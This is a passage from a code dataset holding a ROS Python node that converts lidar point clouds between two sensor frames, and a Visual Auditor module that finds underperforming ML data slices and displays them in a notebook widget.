"imageio.mimwrite", "line_number": 1080, "usage_type": "call"}, {"api_name": "imageio.mimwrite", "line_number": 1081, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1081, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1091, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1091, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 1092, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 1094, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 1095, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 1102, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 1102, "usage_type": "attribute"}, {"api_name": "torch.set_default_tensor_type", "line_number": 1150, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 1157, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 1157, "usage_type": "attribute"}]}
+{"seq_id": "69875777048", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nfrom __future__ import division\n\n# Python imports\nimport numpy as np\nimport scipy.io as sio\nimport os, sys, time\n\n# ROS imports\nimport rospy\nimport ros_numpy\n# tf imports \nimport tf \nfrom tf import transformations\nimport std_msgs.msg\nfrom rospkg import RosPack\nfrom std_msgs.msg import UInt8\n\nfrom std_msgs.msg import Header\nfrom pyquaternion import Quaternion\nimport sensor_msgs.point_cloud2 as pc2\nfrom sensor_msgs.msg import PointCloud2, PointField\n\nimport pdb\n\npackage = RosPack()\npackage_path = package.get_path('yolov3_pytorch_ros')\n\n\ndef transform_xyz_points(trfm_mat, cloud_array, remove_nans=True, dtype=np.float):\n '''\n '''\n if remove_nans:\n #pdb.set_trace()\n mask = np.isfinite(cloud_array['x']) & np.isfinite(cloud_array['y']) & np.isfinite(cloud_array['z']) & np.isfinite(cloud_array['intensity'])\n cloud_array = cloud_array[mask]\n\n # now let us transform the points \n xyz = tuple(np.dot(trfm_mat, np.array([cloud_array['x'], cloud_array['y'], cloud_array['z'], 1.0], dtype=object)))[:3]\n points = np.zeros(cloud_array.shape + (4,), dtype=dtype)\n points[...,0] = xyz[0]\n points[...,1] = xyz[1]\n points[...,2] = xyz[2]\n points[...,3] = cloud_array['intensity']\n # print(\"points: {0} \".format(points))\n\n return points \n\ndef xyz_array_to_pointcloud2(points_sum, msg_in):\n '''\n Create a sensor_msgs.PointCloud2 from an array of points.\n '''\n msg = PointCloud2()\n msg.header.stamp = msg_in.header.stamp\n msg.header.frame_id = \"rs32\"\n msg.height = 1 \n msg.width = points_sum.shape[0]\n msg.fields = [\n PointField('x', 0, PointField.FLOAT32, 1),\n PointField('y', 4, PointField.FLOAT32, 1),\n PointField('z', 8, PointField.FLOAT32, 1),\n PointField('intensity', 12, PointField.FLOAT32, 1)\n ]\n msg.is_bigendian = False\n msg.point_step = 16\n msg.row_step = points_sum.shape[0]\n msg.is_dense = int(np.isfinite(points_sum).all())\n msg.data = np.asarray(points_sum, np.float32).tobytes()\n return msg\n\n# Converter \nclass RS16_to_RS32_TFManager():\n def __init__(self):\n # Load image parameter and confidence threshold\n self.rs16_topic = rospy.get_param('~rs16_topic', '/ns1/rslidar_points')\n self.rs32_topic = rospy.get_param('~rs32_topic', '/ns2/rslidar_points')\n\n print(\"we should set default value for the tf: rs16 to rs32 if they are static\")\n self.trans = (-0.314, -0.0155, -0.261) # x, y, z \n self.rot_quaternion = (-0.0117, -0.00218, 1.0, -0.00688) # (x, y, z, w)\n self.trfm_matrix = self.tm_from_trans_rot(self.trans,self.rot_quaternion)\n\n # Load publisher topics\n self.pub_pc_rs16_under_rs32_topic = rospy.get_param('~rs16_to_rs32_topic')\n\n rospy.loginfo(\"Start converting pc in rs16 to rs32\")\n\n # Define subscribers\n self.pc_rs16_sub = rospy.Subscriber(self.rs16_topic, PointCloud2, self.rs16_callback, queue_size = 1, buff_size = 2**24)\n self.pc_rs32_sub = rospy.Subscriber(self.rs32_topic, PointCloud2, self.rs32_callback, queue_size = 1, buff_size = 2**24)\n\n # Define publishers\n self.pub_ = rospy.Publisher(self.pub_pc_rs16_under_rs32_topic, PointCloud2, queue_size=10)\n rospy.loginfo(\"Launched node for tf converter\")\n\n # tf listener \n self.listener = tf.TransformListener(rospy.Duration(10.0))\n # Spin\n rospy.spin()\n\n def tm_from_trans_rot(self, translation, rotation):\n \"\"\"\n :param translation: translation expressed as a tuple (x,y,z)\n :param rotation: rotation quaternion expressed as a tuple (x,y,z,w)\n :return: a :class:`numpy.matrix` 4x4 representation of the transform \n Converts a transformation from :class:`tf.Transformer` into a representation as a 4x4 matrix.\n \"\"\"\n return np.dot(transformations.translation_matrix(translation), transformations.quaternion_matrix(rotation))\n\n def rs16_callback(self, msg):\n # related data info \n msg_cloud = ros_numpy.point_cloud2.pointcloud2_to_array(msg) # msg is of type pointcloud2 \n # transformed data \n # monitor tf to get the transformation matrix \n try:\n (trans,rot_quaternion) = self.listener.lookupTransform('rs16', 'rs32', rospy.Time(0))\n # print(\"trans: {0}\".format(trans)) \n # print(\"rot: {0}\".format(rot_quaternion))\n # make transformation matrix \n trfm_matrix = self.tm_from_trans_rot(trans,rot_quaternion)\n trans_points = transform_xyz_points(trfm_matrix, msg_cloud, True) # size: N x 4 (last row is (0, 0, 0, 1)), so it will maintrain its intensity, format: (x, y, z, intensity)\n \n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n # set it to default value \n print(\"using default value since the transform is static for the two lidars\")\n # use default value \n trans_points = transform_xyz_points(self.trfm_matrix, msg_cloud, True) # size: N x 4 (last row is (0, 0, 0, 1)), so it will maintrain its intensity, format: (x, y, z, intensity)\n\n # msg is passed in to set the meta information \n msg_transformed = xyz_array_to_pointcloud2(trans_points, msg)\n self.pub_.publish(msg_transformed)\n\n def rs32_callback(self, msg):\n pass \n\nif __name__==\"__main__\":\n # Initialize node\n rospy.init_node(\"RS16_to_RS32_TFManager_Node\")\n\n dm = RS16_to_RS32_TFManager()\n\n", "repo_name": "eriche2016/YOLOV3_In_ROS", "sub_path": "src/yolov3_det_pytorch_ros/src/convert_pc_rs16_to_rs32.py", "file_name": "convert_pc_rs16_to_rs32.py", "file_ext": "py", "file_size_in_byte": 5549, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "rospkg.RosPack", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.isfinite", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 42, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.PointCloud2", "line_number": 55, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.PointField", "line_number": 61, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.PointField.FLOAT32", "line_number": 61, "usage_type": "attribute"}, {"api_name": "sensor_msgs.msg.PointField", "line_number": 62, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.PointField.FLOAT32", "line_number": 62, "usage_type": "attribute"}, {"api_name": "sensor_msgs.msg.PointField", "line_number": 63, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.PointField.FLOAT32", "line_number": 63, "usage_type": "attribute"}, {"api_name": "sensor_msgs.msg.PointField", "line_number": 64, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.PointField.FLOAT32", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.isfinite", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 70, "usage_type": "attribute"}, {"api_name": "rospy.get_param", "line_number": 77, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 78, "usage_type": "call"}, {"api_name": "rospy.get_param", "line_number": 86, "usage_type": "call"}, {"api_name": "rospy.loginfo", "line_number": 88, "usage_type": "call"}, {"api_name": "rospy.Subscriber", "line_number": 91, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.PointCloud2", "line_number": 91, "usage_type": "argument"}, {"api_name": "rospy.Subscriber", "line_number": 92, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.PointCloud2", "line_number": 92, "usage_type": "argument"}, {"api_name": "rospy.Publisher", "line_number": 95, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.PointCloud2", "line_number": 95, "usage_type": "argument"}, {"api_name": "rospy.loginfo", "line_number": 96, "usage_type": "call"}, {"api_name": "tf.TransformListener", "line_number": 99, "usage_type": "call"}, {"api_name": "rospy.Duration", "line_number": 99, "usage_type": "call"}, {"api_name": "rospy.spin", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 110, "usage_type": "call"}, {"api_name": "tf.transformations.translation_matrix", "line_number": 110, "usage_type": "call"}, {"api_name": "tf.transformations", "line_number": 110, "usage_type": "name"}, {"api_name": "tf.transformations.quaternion_matrix", "line_number": 110, "usage_type": "call"}, {"api_name": "ros_numpy.point_cloud2.pointcloud2_to_array", "line_number": 114, "usage_type": "call"}, {"api_name": "ros_numpy.point_cloud2", "line_number": 114, "usage_type": "attribute"}, {"api_name": "rospy.Time", "line_number": 118, "usage_type": "call"}, {"api_name": "tf.LookupException", "line_number": 125, "usage_type": "attribute"}, {"api_name": "tf.ConnectivityException", "line_number": 125, "usage_type": "attribute"}, {"api_name": "tf.ExtrapolationException", "line_number": 125, "usage_type": "attribute"}, {"api_name": "rospy.init_node", "line_number": 140, "usage_type": "call"}]}
+{"seq_id": "37545802102", "text": "from IPython.display import display_html\nimport html\nimport random\nimport pkgutil\nimport codecs\nimport json\nimport numpy as np\nimport pandas as pd\nimport functools\nimport copy\nimport concurrent.futures\nfrom sklearn.metrics import log_loss\nfrom scipy import stats\nimport math\n\ndef t_testing(sample_a, reference, alpha=0.05):\n ''' Unpaired two-sample (Welch's) t-test '''\n mu, s, n = reference[0], reference[1], reference[2]\n sample_b_mean = (mu*n - np.sum(sample_a))/(n-len(sample_a))\n sample_b_var = (s**2*(n-1) - np.std(sample_a)**2*(len(sample_a)-1))/(n-len(sample_a)-1)\n\n t = np.mean(sample_a) - sample_b_mean\n t /= math.sqrt( np.var(sample_a)/len(sample_a) + sample_b_var/(n-len(sample_a)) )\n\n prob = stats.norm.cdf(t)\n return prob\n \n\ndef effect_size(sample_a, reference):\n mu, s, n = reference[0], reference[1], reference[2]\n if n-len(sample_a) == 0:\n return 0\n sample_b_mean = (mu*n - np.sum(sample_a))/(n-len(sample_a))\n sample_b_var = (s**2*(n-1) - np.std(sample_a)**2*(len(sample_a)-1))/(n-len(sample_a)-1)\n if sample_b_var < 0:\n sample_b_var = 0.\n\n diff = np.mean(sample_a) - sample_b_mean\n diff /= math.sqrt( (np.std(sample_a) + math.sqrt(sample_b_var))/2. )\n return diff\n\nclass Slice:\n def __init__(self, filters, data_idx):\n self.filters = filters\n self.data_idx = data_idx\n self.size = len(data_idx)\n self.effect_size = None\n self.metric = None\n\n def get_filter(self):\n return self.filters\n\n def set_filter(self, filters):\n self.filters = filters\n\n def set_metric(self, metric):\n self.metric = metric\n\n def set_effect_size(self, effect_size):\n self.effect_size = effect_size\n\n def union(self, s):\n if set(self.filters.keys()) == set(s.filters.keys()):\n for k in self.filters.keys():\n self.filters[k] = self.filters[k] + s.filters[k]\n else:\n return False\n\n idx = self.data_idx.difference(s.data_idx)\n self.data_idx = idx.append(s.data_idx)\n self.size = len(self.data_idx)\n\n return True\n\n def intersect(self, s):\n for k, v in list(s.filters.items()):\n if k not in self.filters:\n self.filters[k] = v\n else:\n for condition in s.filters[k]:\n if condition not in self.filters[k]:\n self.filters[k].append(condition)\n\n idx = self.data_idx.intersection(s.data_idx)\n self.data_idx = idx\n self.size = len(self.data_idx)\n\n return True\n\n def __str__(self):\n slice_desc = ''\n for k, v in list(self.filters.items()):\n slice_desc += '%s:%s ' % (k, v)\n return slice_desc\n\n\nclass SliceFinder:\n def __init__(self, model, data):\n self.model = model\n self.data = data\n self.slices = []\n self.samples = {}\n\n def find_slice(self, k=50, epsilon=0.2, alpha=0.05, degree=3, risk_control=True, max_workers=1):\n ''' Find interesting slices '''\n ''' risk_control parameter is obsolete; we do post processing for it '''\n assert k > 0, 'Number of recommendation k should be greater than 0'\n\n metrics_all = self.evaluate_model(self.data)\n reference = (np.mean(metrics_all), np.std(\n metrics_all), len(metrics_all))\n\n slices = []\n uninteresting = []\n for i in range(1, degree+1):\n print('degree %s' % i)\n # degree 1~3 feature crosses\n print('crossing')\n if i == 1:\n candidates = self.slicing()\n else:\n candidates = self.crossing(uninteresting, i)\n print('effect size filtering')\n interesting, uninteresting_ = self.filter_by_effect_size(candidates, reference, epsilon, max_workers=max_workers, risk_control=risk_control)\n uninteresting += uninteresting_\n slices += interesting\n if len(slices) >= k:\n break\n\n print('sorting')\n slices = sorted(slices, key=lambda s: s.size, reverse=True)\n recommendations = slices[:k]\n\n self.save_slices_to_file(recommendations, reference[0], 'slices.json')\n self.compute_overlapping_samples(recommendations, 'overlapping_samples.json')\n self.count_common_samples('common_samples.json')\n \n return recommendations\n\n def save_slices_to_file(self, recommendations, model_average, filename):\n slices = []\n for s in recommendations:\n slice = {}\n description = ''\n for i in range(len(s.get_filter().keys())):\n if (i > 0):\n description += ', '\n description += str(list(s.get_filter().keys())[i]) + ': ' + str(list(s.get_filter().values())[i][0][0])\n slice[description] = {\n \"slice\": description,\n \"effect_size\": s.effect_size,\n \"metric\": s.metric,\n \"size\": s.size,\n \"degree\": len(s.get_filter().keys()),\n \"data_idx\": list(s.data_idx)\n }\n slices.append(slice)\n data = {}\n self.slices = slices\n data[\"data\"] = slices\n data[\"model\"] = model_average\n \n if (filename == None):\n return json.dumps(data)\n\n with open(filename, 'w') as f:\n json.dump(data, f)\n \n return json.dumps(data)\n\n def compute_overlapping_samples(self, recommendations, filename):\n sampleDict = {}\n for s in recommendations:\n sliceSet = set()\n description = ''\n keyList = list(s.get_filter().keys())\n valueList = list(s.get_filter().values())\n for i in range(len(s.get_filter().keys())):\n if (i > 0):\n description += ', '\n description += str(keyList[i]) + ': ' + str(valueList[i][0][0])\n for i in range(len(s.get_filter().keys())):\n for index, row in self.data[0].iterrows():\n for key in keyList:\n if row[key] == valueList[i][0][0]:\n sliceSet.add(index)\n sampleDict[description] = sliceSet\n for key in sampleDict.keys():\n sampleDict[key] = list(sampleDict[key])\n self.samples=sampleDict\n\n if (filename == None):\n return json.dumps(sampleDict)\n\n with open(filename, \"w\") as outfile:\n json.dump(sampleDict, outfile)\n\n return json.dumps(sampleDict)\n \n def count_common_samples(self, filename):\n commonSamples = {}\n for s1 in range(0, len(self.slices) - 1):\n for s2 in range(1, len(self.slices)):\n slice1 = list(self.slices[s1].keys())[0]\n slice2 = list(self.slices[s2].keys())[0]\n arr1 = self.samples[slice1]\n arr2 = self.samples[slice2]\n if (arr1 is None or arr2 is None):\n return 0\n random.shuffle(arr1)\n arr1 = arr1[0:2000]\n count = len([value for value in arr1 if value in arr2])\n commonSamples[slice1 + '-' + slice2] = count\n commonSamples[slice2 + '-' + slice1] = count\n\n if (filename == None):\n return json.dumps(commonSamples)\n\n with open(filename, \"w\") as outfile:\n json.dump(commonSamples, outfile)\n \n return json.dumps(commonSamples)\n\n def slicing(self):\n ''' Generate base slices '''\n X, y = self.data[0], self.data[1]\n n, m = X.shape[0], X.shape[1]\n\n slices = []\n for col in X.columns:\n uniques, counts = np.unique(X[col], return_counts=True)\n if len(uniques) == n:\n continue\n if len(uniques) > n/2.:\n bin_edges = self.binning(X[col], n_bin=10)\n for i in range(len(bin_edges)-1):\n data_idx = X[np.logical_and(\n bin_edges[i] <= X[col], X[col] < bin_edges[i+1])].index\n s = Slice(\n {col: [[bin_edges[i], bin_edges[i+1]]]}, data_idx)\n slices.append(s)\n else:\n for v in uniques:\n data_idx = X[X[col] == v].index\n s = Slice({col: [[v]]}, data_idx)\n slices.append(s)\n\n return slices\n\n def crossing(self, slices, degree):\n ''' Cross uninteresting slices together '''\n crossed_slices = []\n for i in range(len(slices)-1):\n for j in range(i+1, len(slices)):\n if len(slices[i].filters) + len(slices[j].filters) == degree:\n slice_ij = copy.deepcopy(slices[i])\n slice_ij.intersect(slices[j])\n crossed_slices.append(slice_ij)\n return crossed_slices\n\n def evaluate_model(self, data, metric=log_loss, reverse=False):\n ''' evaluate model on a given data (X, y), example by example '''\n X, y = copy.deepcopy(data[0]), copy.deepcopy(data[1])\n X['Label'] = y\n X = X.dropna()\n y = X['Label']\n X = X.drop(['Label'], axis=1)\n\n y_p = self.model.predict_proba(X)\n y_pred = self.model.predict(X)\n y_actual = np.array(y)\n y_pred = list(map(functools.partial(np.expand_dims, axis=0), y_pred))\n y_p = list(map(functools.partial(np.expand_dims, axis=0), y_p))\n y = list(map(functools.partial(np.expand_dims, axis=0), y))\n if metric == log_loss:\n if (reverse):\n l = map(functools.partial(\n log_loss, labels=self.model.classes_), y, y_p)\n return list(map(lambda x: -1 * x, l))\n return list(map(functools.partial(metric, labels=self.model.classes_), y, y_p))\n\n def filter_by_effect_size(self, slices, reference, epsilon=0.5, max_workers=1, alpha=0.05, risk_control=True):\n ''' Filter slices by the minimum effect size '''\n filtered_slices = []\n rejected = []\n\n with concurrent.futures.ProcessPoolExecutor(max_workers=max_workers) as executor:\n batch_jobs = []\n for s in slices:\n if s.size == 0:\n continue\n batch_jobs.append(executor.submit(\n self.eff_size_job, s, reference, alpha))\n for job in concurrent.futures.as_completed(batch_jobs):\n if job.cancelled():\n continue\n elif job.done():\n s = job.result()\n if s.effect_size >= epsilon:\n filtered_slices.append(s)\n else:\n rejected.append(s)\n return filtered_slices, rejected\n\n def eff_size_job(self, s, reference, alpha=0.05):\n data = (self.data[0].loc[s.data_idx], self.data[1].loc[s.data_idx])\n m_slice = self.evaluate_model(data)\n eff_size = effect_size(m_slice, reference)\n\n s.set_metric(np.mean(m_slice))\n s.set_effect_size(eff_size)\n return s \n\n def merge_slices(self, slices, reference, epsilon):\n ''' Merge slices with the same filter attributes\n if the minimum effect size condition is satisfied '''\n merged_slices = []\n\n sorted_slices = sorted(\n slices, key=lambda x: x.effect_size, reverse=True)\n taken = []\n for i in range(len(sorted_slices)-1):\n if i in taken:\n continue\n\n s_ = copy.deepcopy(sorted_slices[i])\n taken.append(i)\n for j in range(i, len(sorted_slices)):\n if j in taken:\n continue\n\n prev = copy.deepcopy(s_)\n if s_.union(sorted_slices[j]):\n m_s_ = self.evaluate_model(\n (self.data[0].loc[s_.data_idx], self.data[1].loc[s_.data_idx]))\n eff_size = effect_size(m_s_, reference)\n if eff_size >= epsilon:\n s_.set_effect_size(eff_size)\n taken.append(j)\n else:\n s_ = prev\n\n merged_slices.append(s_)\n\n return merged_slices\n\n def filter_by_significance(self, slices, reference, alpha, max_workers=10):\n ''' Return significant slices '''\n filtered_slices, bf_filtered_slices, ai_filtered_slices = [], [], []\n rejected, bf_rejected, ai_rejected = [], [], []\n\n test_results = []\n with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:\n batch_jobs = dict()\n for s in slices:\n if s.size == 0:\n continue\n\n data = (self.data[0].loc[s.data_idx],\n self.data[1].loc[s.data_idx])\n batch_jobs[executor.submit(\n self.significance_job, data, reference, alpha, len(slices))] = s\n\n for job in concurrent.futures.as_completed(batch_jobs):\n if job.cancelled():\n continue\n elif job.done():\n test_results.append((batch_jobs[job], job.result()))\n\n alpha_wealth = alpha\n for r in test_results:\n s, p = r[0], r[1]\n if p <= alpha:\n filtered_slices.append(s)\n else:\n rejected.append(s)\n if p <= alpha/len(test_results):\n bf_filtered_slices.append(s)\n else:\n bf_rejected.append(s)\n if p <= alpha_wealth:\n ai_filtered_slices.append(s)\n alpha_wealth += alpha\n else:\n ai_rejected.append(s)\n alpha_wealth -= alpha/(1.-alpha)\n\n return filtered_slices, rejected, bf_filtered_slices, bf_rejected, ai_filtered_slices, ai_rejected\n\n def significance_job(self, data, reference, alpha, n_slices, ):\n m_slice = self.evaluate_model(data)\n test_result = t_testing(m_slice, reference, alpha)\n return test_result\n\n def binning(self, col, n_bin=20):\n ''' Equi-height binning '''\n bin_edges = stats.mstats.mquantiles(\n col, np.arange(0., 1.+1./n_bin, 1./n_bin))\n return bin_edges\n \n def find_slices_and_visualize(self, k=50, epsilon=0.2, alpha=0.05, degree=3, risk_control=True, max_workers=1):\n ''' Find interesting slices and generate visual auditor '''\n assert k > 0\n\n metrics_all = self.evaluate_model(self.data)\n reference = (np.mean(metrics_all), np.std(\n metrics_all), len(metrics_all))\n\n slices = []\n uninteresting = []\n for i in range(1, degree+1):\n print('degree %s' % i)\n print('crossing')\n if i == 1:\n candidates = self.slicing()\n else:\n candidates = self.crossing(uninteresting, i)\n print('effect size filtering')\n interesting, uninteresting_ = self.filter_by_effect_size(candidates, reference, epsilon, max_workers=max_workers, risk_control=risk_control)\n uninteresting += uninteresting_\n slices += interesting\n if len(slices) >= k:\n break\n\n print('sorting')\n slices = sorted(slices, key=lambda s: s.size, reverse=True)\n recommendations = slices[:k]\n\n slices_str = self.save_slices_to_file(recommendations, reference[0], None)\n samples_str = self.compute_overlapping_samples(recommendations, None)\n common_samples_str = self.count_common_samples(None)\n\n html_file = codecs.open(\"bundle.html\", 'r')\n html_str = html_file.read()\n\n html_str = html_str.replace('{\"model\":\"insert log loss slices\",\"data\":\"insert log loss slices\"}', slices_str)\n html_str = html_str.replace('{\"model\":\"insert log loss samples\",\"data\":\"insert log loss samples\"}', samples_str)\n html_str = html_str.replace('{\"data\":\"insert common samples\"}', common_samples_str)\n\n html_str = html.escape(html_str)\n\n iframe_id = 'visual-auditor-iframe-' + str(int(random.random() * 1e8))\n\n iframe = '''\n \n '''.format(html_str, iframe_id)\n\n display_html(iframe, raw=True)\n\n\ndef _make_html():\n \"\"\"\n Function to create an HTML string to bundle Visual Auditor's html, css, and js.\n Args:\n \n Return:\n HTML code\n \"\"\"\n # HTML template for Visual Auditor widget\n html_top = '''Visual Auditor '''\n html_bottom = ''''''\n\n # Read the bundled JS file\n js_string = pkgutil.get_data(__name__, 'visualauditor.js')\n\n # Inject the JS to the html template\n html_str = html_top + \\\n ''''''.format(js_string) + \\\n html_bottom\n\n return html.escape(html_str)\n\n\ndef visualize():\n \"\"\"\n Render Visual Auditor in the output cell.\n \"\"\" \n html_file = codecs.open(\"bundle.html\", 'r')\n html_str = html_file.read()\n\n slices_file = codecs.open(\"slices.json\", 'r')\n slices_str = slices_file.read()\n html_str = html_str.replace('{\"model\":\"insert log loss slices\",\"data\":\"insert log loss slices\"}', slices_str)\n\n samples_file = codecs.open(\"overlapping_samples.json\", 'r')\n samples_str = samples_file.read()\n html_str = html_str.replace('{\"data\":\"insert log loss samples\"}', samples_str)\n\n common_samples_file = codecs.open(\"common_samples.json\", 'r')\n common_samples_str = common_samples_file.read()\n html_str = html_str.replace('{\"data\":\"insert common samples\"}', common_samples_str)\n\n reverse_slices_file = codecs.open(\"reverse_slices.json\", 'r')\n reverse_slices_str = reverse_slices_file.read()\n html_str = html_str.replace('{\"model\":\"insert reverse log loss slices\",\"data\":\"insert reverse log loss slices\"}', reverse_slices_str)\n\n reverse_samples_file = codecs.open(\"reverse_overlapping_samples.json\", 'r')\n reverse_samples_str = reverse_samples_file.read()\n html_str = html_str.replace('{\"data\":\"insert reverse log loss samples\"}', reverse_samples_str)\n\n reverse_common_samples_file = codecs.open(\"reverse_common_samples.json\", 'r')\n reverse_common_samples_str = reverse_common_samples_file.read()\n html_str = html_str.replace('{\"data\":\"insert reverse common samples\"}', reverse_common_samples_str)\n\n html_str = html.escape(html_str)\n\n # Randomly generate an ID for the iframe to avoid collision\n iframe_id = 'visual-auditor-iframe-' + str(int(random.random() * 1e8))\n\n iframe = '''\n \n '''.format(html_str, iframe_id)\n\n # Display the iframe\n display_html(iframe, raw=True)\n\n\ndef find_slices_and_visualize(model, data, k=50, epsilon=0.2, alpha=0.05, degree=3, risk_control=True, max_workers=1, precompute=True, prefix=''):\n ''' Find interesting slices and generate visual auditor '''\n slices_str = 'test'\n samples_str = ''\n common_samples_str = ''\n reverse_slices_str = ''\n reverse_samples_str = ''\n reverse_common_samples_str = ''\n\n if (precompute == False):\n sf = SliceFinder(model, data)\n assert k > 0\n\n metrics_all = sf.evaluate_model(sf.data, metric=log_loss, reverse=False)\n reference = (np.mean(metrics_all), np.std(metrics_all), len(metrics_all))\n\n slices = []\n uninteresting = []\n for i in range(1, degree+1):\n if i == 1:\n candidates = sf.slicing()\n else:\n candidates = sf.crossing(uninteresting, i)\n interesting, uninteresting_ = sf.filter_by_effect_size(candidates, reference, epsilon, max_workers=max_workers, risk_control=risk_control)\n uninteresting += uninteresting_\n slices += interesting\n if len(slices) >= k:\n break\n\n slices = sorted(slices, key=lambda s: s.size, reverse=True)\n recommendations = slices[:k]\n\n slices_str = sf.save_slices_to_file(recommendations, reference[0], prefix + 'slices.json')\n samples_str = sf.compute_overlapping_samples(recommendations, prefix + 'overlapping_samples.json')\n common_samples_str = sf.count_common_samples(prefix + 'common_samples.json')\n\n metrics_all = sf.evaluate_model(sf.data, metric=log_loss, reverse=True)\n reference = (np.mean(metrics_all), np.std(metrics_all), len(metrics_all))\n\n slices = []\n uninteresting = []\n for i in range(1, degree+1):\n if i == 1:\n candidates = sf.slicing()\n else:\n candidates = sf.crossing(uninteresting, i)\n interesting, uninteresting_ = sf.filter_by_effect_size(candidates, reference, epsilon, max_workers=max_workers, risk_control=risk_control)\n uninteresting += uninteresting_\n slices += interesting\n if len(slices) >= k:\n break\n\n slices = sorted(slices, key=lambda s: s.size, reverse=True)\n reverse_recommendations = slices[:k]\n\n reverse_slices_str = sf.save_slices_to_file(reverse_recommendations, reference[0], prefix + 'reverse_slices.json')\n reverse_samples_str = sf.compute_overlapping_samples(reverse_recommendations, prefix + 'reverse_overlapping_samples.json')\n reverse_common_samples_str = sf.count_common_samples(prefix + 'reverse_common_samples.json')\n else:\n slices_file = codecs.open(prefix + \"slices.json\", 'r')\n slices_str = slices_file.read()\n\n samples_file = codecs.open(prefix + \"overlapping_samples.json\", 'r')\n samples_str = samples_file.read()\n\n common_samples_file = codecs.open(prefix + \"common_samples.json\", 'r')\n common_samples_str = common_samples_file.read()\n\n reverse_slices_file = codecs.open(prefix + \"reverse_slices.json\", 'r')\n reverse_slices_str = reverse_slices_file.read()\n\n reverse_samples_file = codecs.open(prefix + \"reverse_overlapping_samples.json\", 'r')\n reverse_samples_str = reverse_samples_file.read()\n\n reverse_common_samples_file = codecs.open(prefix + \"reverse_common_samples.json\", 'r')\n reverse_common_samples_str = reverse_common_samples_file.read()\n\n html_file = codecs.open(\"bundle.html\", 'r')\n html_str = html_file.read()\n\n html_str = html_str.replace('{\"model\":\"insert log loss slices\",\"data\":\"insert log loss slices\"}', slices_str)\n html_str = html_str.replace('{\"data\":\"insert log loss samples\"}', samples_str)\n html_str = html_str.replace('{\"data\":\"insert common samples\"}', common_samples_str)\n html_str = html_str.replace('{\"model\":\"insert reverse log loss slices\",\"data\":\"insert reverse log loss slices\"}', reverse_slices_str)\n html_str = html_str.replace('{\"data\":\"insert reverse log loss samples\"}', reverse_samples_str)\n html_str = html_str.replace('{\"data\":\"insert reverse common samples\"}', reverse_common_samples_str)\n\n if (prefix == 'adult_'):\n features_str = \"[\\\"Age\\\", \\\"Workclass\\\", \\\"Education\\\", \\\"Marital Status\\\", \\\"Occupation\\\", \\\"Relationship\\\", \\\"Race\\\", \\\"Sex\\\", \\\"Capital Gain\\\", \\\"Capital Loss\\\", \\\"Hours Per Week\\\", \\\"Country\\\"]\"\n elif (prefix == 'gc_'):\n features_str = \"[\\\"Checking Account\\\", \\\"Duration\\\", \\\"Credit History\\\", \\\"Purpose\\\", \\\"Credit Amount\\\", \\\"Savings Account\\\", \\\"Employment\\\", \\\"Installment Rate\\\", \\\"Relationship/Sex\\\", \\\"Debtors/Guarantors\\\", \\\"Residence Since\\\", \\\"Property\\\", \\\"Age\\\", \\\"Installment Plans\\\", \\\"Housing\\\", \\\"Existing Credits\\\", \\\"Job\\\", \\\"Maintenance\\\", \\\"Telephone\\\", \\\"Foreign\\\"]\"\n elif (prefix == 'cp_'):\n features_str = \"[\\\"State\\\", \\\"Account Length\\\", \\\"Area Code\\\", \\\"International\\\", \\\"Voicemail Plan\\\", \\\"Voicemail Messages\\\", \\\"Day Minutes\\\", \\\"Day Calls\\\", \\\"Day Charge\\\", \\\"Eve Minutes\\\", \\\"Eve Calls\\\", \\\"Eve Charge\\\", \\\"Night Minutes\\\", \\\"Night Calls\\\", \\\"Night Charge\\\", \\\"Intl Minutes\\\", \\\"Intl Calls\\\", \\\"Intl Charge\\\", \\\"CustServ Calls\\\"]\"\n else:\n features_str = \"[]\"\n\n html_str = html_str.replace('[\"insert dataset features\"]', features_str)\n\n html_str = html.escape(html_str)\n\n iframe_id = 'visual-auditor-iframe-' + str(int(random.random() * 1e8))\n\n iframe = '''\n \n '''.format(html_str, iframe_id)\n\n display_html(iframe, raw=True)", "repo_name": "poloclub/visual-auditor", "sub_path": "visual-auditor-package/notebook-widget/visual_auditor/visual_auditor.py", "file_name": "visual_auditor.py", "file_ext": "py", "file_size_in_byte": 25609, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.sum", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 22, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 23, "usage_type": "call"}, {"api_name": 